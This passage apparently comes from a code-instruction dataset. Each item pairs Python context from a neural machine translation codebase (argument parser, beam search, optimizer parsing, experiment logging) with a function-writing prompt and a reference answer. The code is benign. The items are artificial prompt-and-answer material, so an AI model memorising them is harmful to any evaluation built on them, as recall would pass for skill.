            gr.Textbox,
            section=s3_selection,
        ),
    )
    # NOTE(review): option key spells "storge" — kept as-is; renaming the key
    # would orphan users' saved settings.
    shared.opts.add_option(
        "animatediff_s3_storge_bucket",
        shared.OptionInfo(
            None,
            "Bucket for file storage",
            gr.Textbox,
            section=s3_selection,
        ),
    )
3,827 | import json
import argparse
import torch
import numpy as np
from torch import nn
from src.slurm import init_signal_handler, init_distributed_mode
from src.data.loader import check_data_params, load_data
from src.utils import bool_flag, initialize_exp, set_sampling_probs, shuf_order
from src.model import check_model_params, build_model
from src.trainer import SingleTrainer, EncDecTrainer
from src.evaluation.evaluator import SingleEvaluator, EncDecEvaluator
import apex
from src.fp16 import network_to_half
def bool_flag(s):
    """
    Parse boolean arguments from the command line.
    """
    lowered = s.lower()
    if lowered in FALSY_STRINGS:
        return False
    if lowered in TRUTHY_STRINGS:
        return True
    raise argparse.ArgumentTypeError("Invalid value for a boolean flag!")
The provided code snippet includes necessary dependencies for implementing the `get_parser` function. Write a Python function `def get_parser()` to solve the following problem:
Generate a parameters parser.
Here is the function:
def get_parser():
    """
    Generate a parameters parser.

    Groups: experiment bookkeeping, precision, model architecture, adaptive
    softmax, LM/noise task knobs, data, batching, training, loss
    coefficients, training steps, checkpoint reload, beam search,
    evaluation, debugging and multi-GPU/SLURM settings.
    """
    # parse parameters
    parser = argparse.ArgumentParser(description="Language transfer")
    # main parameters
    parser.add_argument("--dump_path", type=str, default="./dumped/",
                        help="Experiment dump path")
    parser.add_argument("--exp_name", type=str, default="",
                        help="Experiment name")
    parser.add_argument("--save_periodic", type=int, default=0,
                        help="Save the model periodically (0 to disable)")
    parser.add_argument("--exp_id", type=str, default="",
                        help="Experiment ID")
    # float16
    parser.add_argument("--fp16", type=bool_flag, default=False,
                        help="Run model with float16")
    # only use an encoder (use a specific decoder for machine translation)
    parser.add_argument("--encoder_only", type=bool_flag, default=True,
                        help="Only use an encoder")
    parser.add_argument("--english_only", type=bool_flag, default=False,
                        help="Only use english domain (equal to only use one language)")
    # model parameters
    parser.add_argument("--emb_dim", type=int, default=512,
                        help="Embedding layer size")
    parser.add_argument("--n_layers", type=int, default=4,
                        help="Number of Transformer layers")
    parser.add_argument("--n_dec_layers", type=int, default=6,
                        help="Number of Decoder Transformer layers")
    parser.add_argument("--n_heads", type=int, default=8,
                        help="Number of Transformer heads")
    parser.add_argument("--dropout", type=float, default=0,
                        help="Dropout")
    parser.add_argument("--attention_dropout", type=float, default=0,
                        help="Dropout in the attention layer")
    parser.add_argument("--gelu_activation", type=bool_flag, default=False,
                        help="Use a GELU activation instead of ReLU")
    parser.add_argument("--share_inout_emb", type=bool_flag, default=True,
                        help="Share input and output embeddings")
    parser.add_argument("--sinusoidal_embeddings", type=bool_flag, default=False,
                        help="Use sinusoidal embeddings")
    parser.add_argument("--attention_setting", type=str, default="v1", choices=["v1", "v2"],
                        help="Setting for attention module, benefits for distinguish language")
    # adaptive softmax
    parser.add_argument("--asm", type=bool_flag, default=False,
                        help="Use adaptive softmax")
    # peek at --asm with parse_known_args so the cutoff options are only
    # registered when adaptive softmax is actually enabled
    if parser.parse_known_args()[0].asm:
        parser.add_argument("--asm_cutoffs", type=str, default="8000,20000",
                            help="Adaptive softmax cutoffs")
        parser.add_argument("--asm_div_value", type=float, default=4,
                            help="Adaptive softmax cluster sizes ratio")
    # causal language modeling task parameters
    parser.add_argument("--context_size", type=int, default=0,
                        help="Context size (0 means that the first elements in sequences won't have any context)")
    # masked language modeling task parameters
    parser.add_argument("--word_pred", type=float, default=0.15,
                        help="Fraction of words for which we need to make a prediction")
    parser.add_argument("--sample_alpha", type=float, default=0,
                        help="Exponent for transforming word counts to probabilities (~word2vec sampling)")
    parser.add_argument("--word_mask_keep_rand", type=str, default="0.8,0.1,0.1",
                        help="Fraction of words to mask out / keep / randomize, among the words to predict")
    # input sentence noise
    parser.add_argument("--word_shuffle", type=float, default=0,
                        help="Randomly shuffle input words (0 to disable)")
    parser.add_argument("--word_dropout", type=float, default=0,
                        help="Randomly dropout input words (0 to disable)")
    parser.add_argument("--word_blank", type=float, default=0,
                        help="Randomly blank input words (0 to disable)")
    parser.add_argument("--word_mass", type=float, default=0,
                        help="Randomly mask input words (0 to disable)")
    # data
    parser.add_argument("--data_path", type=str, default="",
                        help="Data path")
    parser.add_argument("--lgs", type=str, default="",
                        help="Languages (lg1-lg2-lg3 .. ex: en-fr-es-de)")
    parser.add_argument("--max_vocab", type=int, default=-1,
                        help="Maximum vocabulary size (-1 to disable)")
    parser.add_argument("--min_count", type=int, default=0,
                        help="Minimum vocabulary count")
    parser.add_argument("--lg_sampling_factor", type=float, default=-1,
                        help="Language sampling factor")
    # batch parameters
    parser.add_argument("--bptt", type=int, default=256,
                        help="Sequence length")
    parser.add_argument("--min_len", type=int, default=0,
                        help="Minimum length of sentences (after BPE)")
    parser.add_argument("--max_len", type=int, default=100,
                        help="Maximum length of sentences (after BPE)")
    parser.add_argument("--group_by_size", type=bool_flag, default=True,
                        help="Sort sentences by size during the training")
    parser.add_argument("--batch_size", type=int, default=32,
                        help="Number of sentences per batch")
    parser.add_argument("--max_batch_size", type=int, default=0,
                        help="Maximum number of sentences per batch (used in combination with tokens_per_batch, 0 to disable)")
    parser.add_argument("--tokens_per_batch", type=int, default=-1,
                        help="Number of tokens per batch")
    # training parameters
    parser.add_argument("--split_data", type=bool_flag, default=False,
                        help="Split data across workers of a same node")
    parser.add_argument("--optimizer", type=str, default="adam,lr=0.0001",
                        help="Optimizer (SGD / RMSprop / Adam, etc.)")
    parser.add_argument("--clip_grad_norm", type=float, default=5,
                        help="Clip gradients norm (0 to disable)")
    parser.add_argument("--epoch_size", type=int, default=100000,
                        help="Epoch size / evaluation frequency (-1 for parallel data size)")
    parser.add_argument("--max_epoch", type=int, default=100000,
                        help="Maximum epoch size")
    parser.add_argument("--stopping_criterion", type=str, default="",
                        help="Stopping criterion, and number of non-increase before stopping the experiment")
    parser.add_argument("--validation_metrics", type=str, default="",
                        help="Validation metrics")
    # training coefficients
    parser.add_argument("--lambda_mlm", type=str, default="1",
                        help="Prediction coefficient (MLM)")
    parser.add_argument("--lambda_clm", type=str, default="1",
                        help="Causal coefficient (LM)")
    parser.add_argument("--lambda_bmt", type=str, default="1",
                        help="Back Parallel coefficient")
    parser.add_argument("--lambda_pc", type=str, default="1",
                        help="PC coefficient")
    parser.add_argument("--lambda_ae", type=str, default="1",
                        help="AE coefficient")
    parser.add_argument("--lambda_mt", type=str, default="1",
                        help="MT coefficient")
    parser.add_argument("--lambda_bt", type=str, default="1",
                        help="BT coefficient")
    parser.add_argument("--lambda_mass", type=str, default="1",
                        help="MASS coefficient")
    parser.add_argument("--lambda_span", type=str, default="10000",
                        help="Span coefficient")
    # training steps
    parser.add_argument("--clm_steps", type=str, default="",
                        help="Causal prediction steps (CLM)")
    parser.add_argument("--mlm_steps", type=str, default="",
                        help="Masked prediction steps (MLM / TLM)")
    parser.add_argument("--bmt_steps", type=str, default="",
                        help="Back Machine Translation step")
    parser.add_argument("--mass_steps", type=str, default="",
                        help="MASS prediction steps")
    parser.add_argument("--mt_steps", type=str, default="",
                        help="Machine translation steps")
    parser.add_argument("--ae_steps", type=str, default="",
                        help="Denoising auto-encoder steps")
    parser.add_argument("--bt_steps", type=str, default="",
                        help="Back-translation steps")
    parser.add_argument("--pc_steps", type=str, default="",
                        help="Parallel classification steps")
    # reload a pretrained model
    parser.add_argument("--reload_model", type=str, default="",
                        help="Reload a pretrained model")
    # beam search (for MT only)
    parser.add_argument("--beam_size", type=int, default=1,
                        help="Beam size, default = 1 (greedy decoding)")
    parser.add_argument("--length_penalty", type=float, default=1,
                        help="Length penalty, values < 1.0 favor shorter sentences, while values > 1.0 favor longer ones.")
    parser.add_argument("--early_stopping", type=bool_flag, default=False,
                        help="Early stopping, stop as soon as we have `beam_size` hypotheses, although longer ones may have better scores.")
    # evaluation
    parser.add_argument("--eval_bleu", type=bool_flag, default=False,
                        help="Evaluate BLEU score during MT training")
    parser.add_argument("--eval_only", type=bool_flag, default=False,
                        help="Only run evaluations")
    # debug
    parser.add_argument("--debug_train", type=bool_flag, default=False,
                        help="Use valid sets for train sets (faster loading)")
    parser.add_argument("--debug_slurm", type=bool_flag, default=False,
                        help="Debug multi-GPU / multi-node within a SLURM job")
    # multi-gpu / multi-node
    parser.add_argument("--local_rank", type=int, default=-1,
                        help="Multi-GPU - Local rank")
    parser.add_argument("--master_port", type=int, default=-1,
                        help="Master port (for multi-node SLURM jobs)")
    return parser
3,828 | import os
import io
import sys
import argparse
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from src.utils import AttrDict
from src.utils import bool_flag, initialize_exp
from src.data.dictionary import Dictionary
from src.model.transformer import TransformerModel
from src.model.transformer import BeamHypotheses
from src.fp16 import network_to_half
def bool_flag(s):
    """
    Parse boolean arguments from the command line.
    """
    value = s.lower()
    # falsy strings are checked first, mirroring the original precedence
    for result, accepted in ((False, FALSY_STRINGS), (True, TRUTHY_STRINGS)):
        if value in accepted:
            return result
    raise argparse.ArgumentTypeError("Invalid value for a boolean flag!")
The provided code snippet includes necessary dependencies for implementing the `get_parser` function. Write a Python function `def get_parser()` to solve the following problem:
Generate a parameters parser.
Here is the function:
def get_parser():
    """
    Generate a parameters parser.

    Builds the command-line interface for the sentence translation script.
    """
    p = argparse.ArgumentParser(description="Translate sentences")

    # main parameters
    p.add_argument("--dump_path", type=str, default="./dumped/", help="Experiment dump path")
    p.add_argument("--exp_name", type=str, default="", help="Experiment name")
    p.add_argument("--exp_id", type=str, default="", help="Experiment ID")
    p.add_argument("--fp16", type=bool_flag, default=False, help="Run model with float16")
    p.add_argument("--batch_size", type=int, default=32, help="Number of sentences per batch")
    # model / output paths
    p.add_argument("--model_path", type=str, default="", help="Model path")
    p.add_argument("--output_path", type=str, default="", help="Output path")
    p.add_argument("--beam", type=int, default=1, help="Beam size")
    p.add_argument("--length_penalty", type=float, default=1, help="length penalty")
    # source language / target language
    p.add_argument("--src_lang", type=str, default="", help="Source language")
    p.add_argument("--tgt_lang", type=str, default="", help="Target language")
    return p
3,829 | import os
import io
import sys
import argparse
import torch
import math
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from src.utils import AttrDict
from src.utils import bool_flag, initialize_exp
from src.data.dictionary import Dictionary
from src.model.transformer import TransformerModel
from src.model.transformer import BeamHypotheses
from src.fp16 import network_to_half
class BeamHypotheses(object):
    """Bounded n-best list of beam-search hypotheses, ranked by
    length-penalized log-probability."""

    def __init__(self, n_hyp, max_len, length_penalty, early_stopping):
        """
        Initialize n-best list of hypotheses.
        """
        self.max_len = max_len - 1  # ignoring <BOS>
        self.length_penalty = length_penalty
        self.early_stopping = early_stopping
        self.n_hyp = n_hyp
        self.hyp = []
        self.worst_score = 1e9

    def __len__(self):
        """Number of hypotheses currently stored."""
        return len(self.hyp)

    def add(self, hyp, sum_logprobs):
        """Insert `hyp`; evict the worst entry once the list is over capacity."""
        score = sum_logprobs / len(hyp) ** self.length_penalty
        if len(self) >= self.n_hyp and score <= self.worst_score:
            return  # not competitive: list is full and score is no better
        self.hyp.append((score, hyp))
        if len(self) > self.n_hyp:
            # drop the lowest-scoring entry and track the new worst score
            ranked = sorted((s, i) for i, (s, _) in enumerate(self.hyp))
            del self.hyp[ranked[0][1]]
            self.worst_score = ranked[1][0]
        else:
            self.worst_score = min(score, self.worst_score)

    def is_done(self, best_sum_logprobs):
        """
        If there are enough hypotheses and that none of the hypotheses being generated
        can become better than the worst one in the heap, then we are done with this sentence.
        """
        if len(self) < self.n_hyp:
            return False
        if self.early_stopping:
            return True
        # compare against the best achievable score at maximum length
        return self.worst_score >= best_sum_logprobs / self.max_len ** self.length_penalty
def generate_beam(decoders, src_encodeds, src_len, tgt_lang_id, beam_size, length_penalty, early_stopping, max_len=200, params=None):
    """
    Ensemble beam-search decoding over one or more decoders.

    Args:
        decoders: list of decoder models (incremental `forward('fwd', ...)` API).
        src_encodeds: list of encoder outputs, one per decoder.
        src_len: LongTensor of source lengths, shape (bs,).
        tgt_lang_id: language id used to fill the `langs` input.
        beam_size: number of beams per sentence.
        length_penalty: exponent for length normalization of hypothesis scores.
        early_stopping: stop a sentence as soon as `beam_size` hypotheses exist.
        max_len: maximum generated length (including both boundary tokens).
        params: experiment parameters; must define n_words / pad_index / eos_index.

    Returns:
        (decoded, tgt_len): generated batch (slen, bs) and its lengths.
    """
    assert params is not None
    bs = len(src_len)
    n_words = params.n_words

    # expand source tensors to (bs * beam_size, ...): every beam of a sentence
    # attends to the same encoder output
    src_len = src_len.unsqueeze(1).expand(bs, beam_size).contiguous().view(-1)
    for i in range(len(src_encodeds)):
        src_encodeds[i] = src_encodeds[i].unsqueeze(1).expand(
            (bs, beam_size) + src_encodeds[i].shape[1:]
        ).contiguous().view((bs * beam_size,) + src_encodeds[i].shape[1:])

    # generated sentences (the first token is </s>, which doubles as BOS here)
    generated = src_len.new(max_len, bs * beam_size)
    generated.fill_(params.pad_index)
    generated[0].fill_(params.eos_index)

    # finished hypotheses, one container per input sentence
    generated_hyps = [BeamHypotheses(beam_size, max_len, length_penalty, early_stopping) for _ in range(bs)]

    # position ids / language ids fed to the decoders
    positions = src_len.new(max_len).long()
    positions = torch.arange(max_len, out=positions).unsqueeze(1).expand_as(generated)
    langs = positions.clone().fill_(tgt_lang_id)

    # running beam scores; only the first beam is live initially, so the
    # duplicated beams of a sentence are never all selected at step 1
    beam_scores = src_encodeds[0].new(bs, beam_size).fill_(0)
    beam_scores[:, 1:] = -1e9
    beam_scores = beam_scores.view(-1)

    cur_len = 1
    caches = [{'slen': 0} for _ in range(len(decoders))]
    done = [False for _ in range(bs)]

    while cur_len < max_len:
        # one incremental decoding step per ensemble member
        avg_scores = []
        for i, (src_enc, decoder) in enumerate(zip(src_encodeds, decoders)):
            tensor = decoder.forward(
                'fwd',
                x=generated[:cur_len],
                lengths=src_len.new(bs * beam_size).fill_(cur_len),
                positions=positions[:cur_len],
                langs=langs[:cur_len],
                causal=True,
                src_enc=src_enc,
                src_len=src_len,
                cache=caches[i]
            )
            # with a cache, only the newest time step comes back
            assert tensor.size() == (1, bs * beam_size, decoder.dim)
            tensor = tensor.data[-1, :, :]                   # (bs * beam_size, dim)
            scores = decoder.pred_layer.get_scores(tensor)   # (bs * beam_size, n_words)
            scores = F.log_softmax(scores, dim=-1)
            avg_scores.append(scores)
        # ensemble in probability space: log-mean-exp of member log-probs
        avg_scores = torch.logsumexp(torch.stack(avg_scores, dim=0), dim=0) - math.log(len(decoders))

        # select the next words and their cumulative scores; 2 * beam_size
        # candidates guarantee at least beam_size non-EOS continuations
        _scores = avg_scores + beam_scores[:, None].expand_as(avg_scores)
        _scores = _scores.view(bs, beam_size * n_words)
        next_scores, next_words = torch.topk(_scores, 2 * beam_size, dim=1, largest=True, sorted=True)
        assert next_scores.size() == next_words.size() == (bs, 2 * beam_size)

        next_batch_beam = []
        for sent_id in range(bs):
            # if we are done with this sentence
            done[sent_id] = done[sent_id] or generated_hyps[sent_id].is_done(next_scores[sent_id].max().item())
            if done[sent_id]:
                next_batch_beam.extend([(0, params.pad_index, 0)] * beam_size)  # pad the batch
                continue
            # next beam content for this sentence
            next_sent_beam = []
            for idx, value in zip(next_words[sent_id], next_scores[sent_id]):
                # flat candidate index -> (beam, word)
                beam_id = idx // n_words
                word_id = idx % n_words
                # end of sentence, or next word
                if word_id == params.eos_index or cur_len + 1 == max_len:
                    generated_hyps[sent_id].add(generated[:cur_len, sent_id * beam_size + beam_id].clone(), value.item())
                else:
                    next_sent_beam.append((value, word_id, sent_id * beam_size + beam_id))
                # the beam for the next step is full
                if len(next_sent_beam) == beam_size:
                    break
            # BUG FIX: the original `assert a == 0 if cond else beam_size` parsed as
            # `assert (a == 0) if cond else beam_size`, i.e. on the common path it
            # asserted the truthy constant `beam_size` and checked nothing.
            assert len(next_sent_beam) == (0 if cur_len + 1 == max_len else beam_size)
            if len(next_sent_beam) == 0:
                next_sent_beam = [(0, params.pad_index, 0)] * beam_size  # pad the batch
            next_batch_beam.extend(next_sent_beam)
            assert len(next_batch_beam) == beam_size * (sent_id + 1)

        # sanity check / prepare next batch
        assert len(next_batch_beam) == bs * beam_size
        beam_scores = beam_scores.new([x[0] for x in next_batch_beam])
        beam_words = generated.new([x[1] for x in next_batch_beam])
        beam_idx = src_len.new([x[2] for x in next_batch_beam])

        # re-order running sentences and decoder caches along the selected beams
        generated = generated[:, beam_idx]
        generated[cur_len] = beam_words
        for cache in caches:
            for k in cache.keys():
                if k != 'slen':
                    cache[k] = (cache[k][0][beam_idx], cache[k][1][beam_idx])

        cur_len = cur_len + 1
        # stop when we are done with every sentence
        if all(done):
            break

    # pick the best hypothesis per sentence and build the output batch
    tgt_len = src_len.new(bs)
    best = []
    for i, hypotheses in enumerate(generated_hyps):
        best_hyp = max(hypotheses.hyp, key=lambda x: x[0])[1]
        tgt_len[i] = len(best_hyp) + 1  # +1 for the final </s>
        best.append(best_hyp)
    decoded = src_len.new(tgt_len.max().item(), bs).fill_(params.pad_index)
    for i, hypo in enumerate(best):
        decoded[:tgt_len[i] - 1, i] = hypo
        decoded[tgt_len[i] - 1, i] = params.eos_index
    # every sentence ends up with exactly two </s> (leading + trailing)
    assert (decoded == params.eos_index).sum() == 2 * bs
    return decoded, tgt_len
3,830 | import torch
def BN_convert_float(module):
    """
    Cast every BatchNorm layer under `module` (itself included) back to float32.

    Companion to `network_to_half`: after a blanket ``.half()`` cast, BatchNorm
    parameters/statistics are restored to single precision. A plain ``.apply``
    would not work here because it touches parameters and buffers as well, so
    the conversion could not be guarded by the module type.

    Returns `module` to allow chaining.
    """
    for sub in module.modules():
        if isinstance(sub, torch.nn.modules.batchnorm._BatchNorm):
            sub.float()
    return module
The provided code snippet includes necessary dependencies for implementing the `network_to_half` function. Write a Python function `def network_to_half(network)` to solve the following problem:
Convert model to half precision in a batchnorm-safe way.
Here is the function:
def network_to_half(network):
    """
    Convert model to half precision in a batchnorm-safe way.

    Applies a blanket ``.half()`` cast, then restores every BatchNorm layer
    to float32 via `BN_convert_float`.
    """
    half_model = network.half()
    return BN_convert_float(half_model)
3,831 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
def get_dump_path(params):
    """
    Create a directory to store the experiment and set `params.dump_path`.

    Layout: <dump_path>/<exp_name>/<exp_id>. If `params.exp_id` is empty, it is
    taken from the Chronos/SLURM job id when available, otherwise randomly
    generated.

    BUG FIX: directory creation previously shelled out to
    ``mkdir -p %s`` with the path interpolated into the shell string, which
    breaks on paths containing spaces/quotes and is not portable; use
    ``os.makedirs(..., exist_ok=True)`` instead (same effect as ``mkdir -p``).
    """
    # DUMP_PATH is a module-level default, only consulted when no path is given
    dump_path = DUMP_PATH if params.dump_path == '' else params.dump_path
    assert len(params.exp_name) > 0
    # create the sweep path if it does not exist
    sweep_path = os.path.join(dump_path, params.exp_name)
    os.makedirs(sweep_path, exist_ok=True)
    # create an ID for the job if it is not given in the parameters.
    # if we run on the cluster, the job ID is the one of Chronos/SLURM.
    # otherwise, it is randomly generated
    if params.exp_id == '':
        chronos_job_id = os.environ.get('CHRONOS_JOB_ID')
        slurm_job_id = os.environ.get('SLURM_JOB_ID')
        assert chronos_job_id is None or slurm_job_id is None
        exp_id = chronos_job_id if chronos_job_id is not None else slurm_job_id
        if exp_id is None:
            chars = 'abcdefghijklmnopqrstuvwxyz0123456789'
            while True:
                exp_id = ''.join(random.choice(chars) for _ in range(10))
                if not os.path.isdir(os.path.join(sweep_path, exp_id)):
                    break
        else:
            assert exp_id.isdigit()
        params.exp_id = exp_id
    # create the dump folder / update parameters
    params.dump_path = os.path.join(sweep_path, params.exp_id)
    os.makedirs(params.dump_path, exist_ok=True)
def create_logger(filepath, rank):
    """
    Configure and return the root logger.

    Each distributed process gets its own log file (``<filepath>-<rank>`` for
    ranks > 0). File output is at DEBUG level, console output at INFO. The
    returned logger carries a ``reset_time`` callable that restarts the
    elapsed-time counter of the formatter.
    """
    formatter = LogFormatter()

    # optional file handler (DEBUG level), one file per process
    file_handler = None
    if filepath is not None:
        if rank > 0:
            filepath = '%s-%i' % (filepath, rank)
        file_handler = logging.FileHandler(filepath, "a")
        file_handler.setLevel(logging.DEBUG)
        file_handler.setFormatter(formatter)

    # console handler (INFO level)
    console_handler = logging.StreamHandler()
    console_handler.setLevel(logging.INFO)
    console_handler.setFormatter(formatter)

    # reconfigure the root logger from scratch
    logger = logging.getLogger()
    logger.handlers = []
    logger.setLevel(logging.DEBUG)
    logger.propagate = False
    if file_handler is not None:
        logger.addHandler(file_handler)
    logger.addHandler(console_handler)

    # allow callers to reset the formatter's elapsed-time origin
    def reset_time():
        formatter.start_time = time.time()
    logger.reset_time = reset_time

    return logger
The provided code snippet includes necessary dependencies for implementing the `initialize_exp` function. Write a Python function `def initialize_exp(params)` to solve the following problem:
Initialize the experiment: - dump parameters - create a logger
Here is the function:
def initialize_exp(params):
    """
    Initialize the experiment: dump the parameters and create a logger.

    Resolves the dump directory, pickles `params` there, reconstructs the
    launch command line (stored on ``params.command``), then configures and
    returns the logger writing to ``<dump_path>/train.log``.
    """
    # resolve dump path and persist the parameters
    get_dump_path(params)
    pickle.dump(params, open(os.path.join(params.dump_path, 'params.pkl'), 'wb'))

    # reconstruct the command used to launch this run, shell-quoting values
    command = ["python", sys.argv[0]]
    for x in sys.argv[1:]:
        if x.startswith('--'):
            assert '"' not in x and "'" not in x
            command.append(x)
            continue
        assert "'" not in x
        if re.match('^[a-zA-Z0-9_]+$', x):
            command.append("%s" % x)
        else:
            command.append("'%s'" % x)
    command = ' '.join(command)
    params.command = command + ' --exp_id "%s"' % params.exp_id

    # check experiment name
    assert len(params.exp_name.strip()) > 0

    # create a logger and announce the configuration
    logger = create_logger(os.path.join(params.dump_path, 'train.log'), rank=getattr(params, 'global_rank', 0))
    logger.info("============ Initialized logger ============")
    logger.info("\n".join("%s: %s" % (k, str(v))
                          for k, v in sorted(dict(vars(params)).items())))
    logger.info("The experiment will be stored in %s\n" % params.dump_path)
    logger.info("Running command: %s" % command)
    logger.info("")
    return logger
3,832 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
class AdamInverseSqrtWithWarmup(optim.Adam):
    """
    Adam with a linear learning-rate warmup followed by inverse-square-root decay.

    During warmup the LR is raised linearly from `warmup_init_lr` to `lr` over
    `warmup_updates` steps:

        lr(t) = warmup_init_lr + t * (lr - warmup_init_lr) / warmup_updates

    Afterwards it decays proportionally to the inverse square root of the
    update count, with the decay factor chosen so the two phases meet at `lr`:

        lr(t) = lr * sqrt(warmup_updates) / sqrt(t)
    """

    def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
                 weight_decay=0, warmup_updates=4000, warmup_init_lr=1e-7):
        # start every group at the warmup initial LR; step() raises it
        super().__init__(
            params,
            lr=warmup_init_lr,
            betas=betas,
            eps=eps,
            weight_decay=weight_decay,
        )
        self.warmup_updates = warmup_updates
        self.warmup_init_lr = warmup_init_lr
        # per-step LR increment during warmup (warmup ends exactly at `lr`)
        self.lr_step = (lr - warmup_init_lr) / warmup_updates
        # decay factor aligning the post-warmup schedule with `lr`
        self.decay_factor = lr * warmup_updates ** 0.5
        for group in self.param_groups:
            group['num_updates'] = 0

    def get_lr_for_step(self, num_updates):
        """Learning rate after `num_updates` optimizer steps."""
        if num_updates >= self.warmup_updates:
            return self.decay_factor * num_updates ** -0.5
        return self.warmup_init_lr + num_updates * self.lr_step

    def step(self, closure=None):
        super().step(closure)
        # bump the counters and refresh each group's LR
        for group in self.param_groups:
            group['num_updates'] += 1
            group['lr'] = self.get_lr_for_step(group['num_updates'])
The provided code snippet includes necessary dependencies for implementing the `get_optimizer` function. Write a Python function `def get_optimizer(parameters, s)` to solve the following problem:
Parse optimizer parameters. Input should be of the form: - "sgd,lr=0.01" - "adagrad,lr=0.1,lr_decay=0.05"
Here is the function:
def get_optimizer(parameters, s):
    """
    Parse optimizer parameters and build the optimizer.

    Input should be of the form:
        - "sgd,lr=0.01"
        - "adagrad,lr=0.1,lr_decay=0.05"

    For Adam variants, `beta1`/`beta2` are folded into the `betas` tuple.

    Raises:
        Exception: unknown method name, or a keyword the optimizer's
            constructor does not accept.

    BUG FIX: `inspect.getargspec` was removed in Python 3.11; switched to
    `getfullargspec`, which additionally exposes the keyword-only parameters
    of newer torch optimizers so those are accepted too.
    """
    if "," in s:
        method = s[:s.find(',')]
        optim_params = {}
        for x in s[s.find(',') + 1:].split(','):
            split = x.split('=')
            assert len(split) == 2
            # every value must parse as a (signed) float  (raw string: \d
            # in a plain literal is a SyntaxWarning on Python 3.12+)
            assert re.match(r"^[+-]?(\d+(\.\d*)?|\.\d+)$", split[1]) is not None
            optim_params[split[0]] = float(split[1])
    else:
        method = s
        optim_params = {}
    if method == 'adadelta':
        optim_fn = optim.Adadelta
    elif method == 'adagrad':
        optim_fn = optim.Adagrad
    elif method == 'adam':
        optim_fn = optim.Adam
        optim_params['betas'] = (optim_params.get('beta1', 0.9), optim_params.get('beta2', 0.999))
        optim_params.pop('beta1', None)
        optim_params.pop('beta2', None)
    elif method == 'adam_inverse_sqrt':
        optim_fn = AdamInverseSqrtWithWarmup
        optim_params['betas'] = (optim_params.get('beta1', 0.9), optim_params.get('beta2', 0.999))
        optim_params.pop('beta1', None)
        optim_params.pop('beta2', None)
    elif method == 'adamax':
        optim_fn = optim.Adamax
    elif method == 'asgd':
        optim_fn = optim.ASGD
    elif method == 'rmsprop':
        optim_fn = optim.RMSprop
    elif method == 'rprop':
        optim_fn = optim.Rprop
    elif method == 'sgd':
        optim_fn = optim.SGD
        assert 'lr' in optim_params
    else:
        raise Exception('Unknown optimization method: "%s"' % method)
    # check that we give good parameters to the optimizer
    spec = inspect.getfullargspec(optim_fn.__init__)
    expected_args = spec.args
    assert expected_args[:2] == ['self', 'params']
    valid_args = set(expected_args[2:]) | set(spec.kwonlyargs)
    if not all(k in valid_args for k in optim_params.keys()):
        raise Exception('Unexpected parameters: expected "%s", got "%s"' % (
            str(expected_args[2:]), str(optim_params.keys())))
    return optim_fn(parameters, **optim_params)
3,833 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `to_cuda` function. Write a Python function `def to_cuda(*args)` to solve the following problem:
Move tensors to CUDA.
Here is the function:
def to_cuda(*args):
    """
    Move every tensor argument to the default CUDA device.

    `None` entries pass through untouched so optional tensors need no
    special-casing. Always returns a list, in argument order.
    """
    moved = []
    for tensor in args:
        moved.append(None if tensor is None else tensor.cuda())
    return moved
3,834 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `restore_segmentation` function. Write a Python function `def restore_segmentation(path)` to solve the following problem:
Take a file segmented with BPE and restore it to its original segmentation.
Here is the function:
def restore_segmentation(path):
    """
    Take a file segmented with BPE and restore it to its original segmentation.

    Rewrites the file in place, removing "@@ " continuation markers
    ("a@@ b" -> "ab") and a dangling "@@" (optionally followed by a space)
    at end of line — the same per-line substitution the previous
    ``sed -i -r 's/(@@ )|(@@ ?$)//g'`` applied.

    BUG FIX: the old implementation interpolated `path` into a shell string
    (breaks on spaces/quotes, unix-only); this uses the stdlib instead.
    Assumes the file is UTF-8 encoded — TODO confirm against the corpus
    preprocessing pipeline.
    """
    assert os.path.isfile(path)
    with open(path, 'r', encoding='utf-8') as f:
        text = f.read()
    restored = re.sub(r'(@@ )|(@@ ?$)', '', text, flags=re.MULTILINE)
    with open(path, 'w', encoding='utf-8') as f:
        f.write(restored)
3,835 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
# Loss-weighting coefficients that may follow an iteration-indexed schedule
# (parsed by parse_lambda_config, refreshed each step by update_lambdas).
DYNAMIC_COEFF = ['lambda_clm', 'lambda_mlm', 'lambda_pc', 'lambda_ae', 'lambda_mt', 'lambda_bt', 'lambda_mass', 'lambda_bmt', 'lambda_span']
The provided code snippet includes necessary dependencies for implementing the `parse_lambda_config` function. Write a Python function `def parse_lambda_config(params)` to solve the following problem:
Parse the configuration of lambda coefficient (for scheduling). x = "3" # lambda will be a constant equal to x x = "0:1,1000:0" # lambda will start from 1 and linearly decrease to 0 during the first 1000 iterations x = "0:0,1000:0,2000:1" # lambda will be equal to 0 for the first 1000 iterations, then will linearly increase to 1 until iteration 2000
Here is the function:
def parse_lambda_config(params):
    """
    Parse the configuration of lambda coefficients (for scheduling).

    Each coefficient in DYNAMIC_COEFF is either a constant, e.g. "3", or a
    comma-separated list of "iteration:value" breakpoints, e.g.
    "0:0,1000:0,2000:1" (0 until iteration 1000, then linear ramp to 1 at
    iteration 2000). Stores the parsed value on `params.<name>` and the
    schedule (or None for constants) on `params.<name>_config`.
    """
    for name in DYNAMIC_COEFF:
        raw = getattr(params, name)
        pieces = raw.split(',')
        if len(pieces) == 1:
            # constant coefficient: no schedule
            setattr(params, name, float(raw))
            setattr(params, name + '_config', None)
            continue
        pairs = [p.split(':') for p in pieces]
        assert all(len(p) == 2 for p in pairs)
        assert all(k.isdigit() for k, _ in pairs)
        # breakpoints must be strictly increasing in iteration number
        assert all(int(pairs[i][0]) < int(pairs[i + 1][0]) for i in range(len(pairs) - 1))
        setattr(params, name, float(pairs[0][1]))
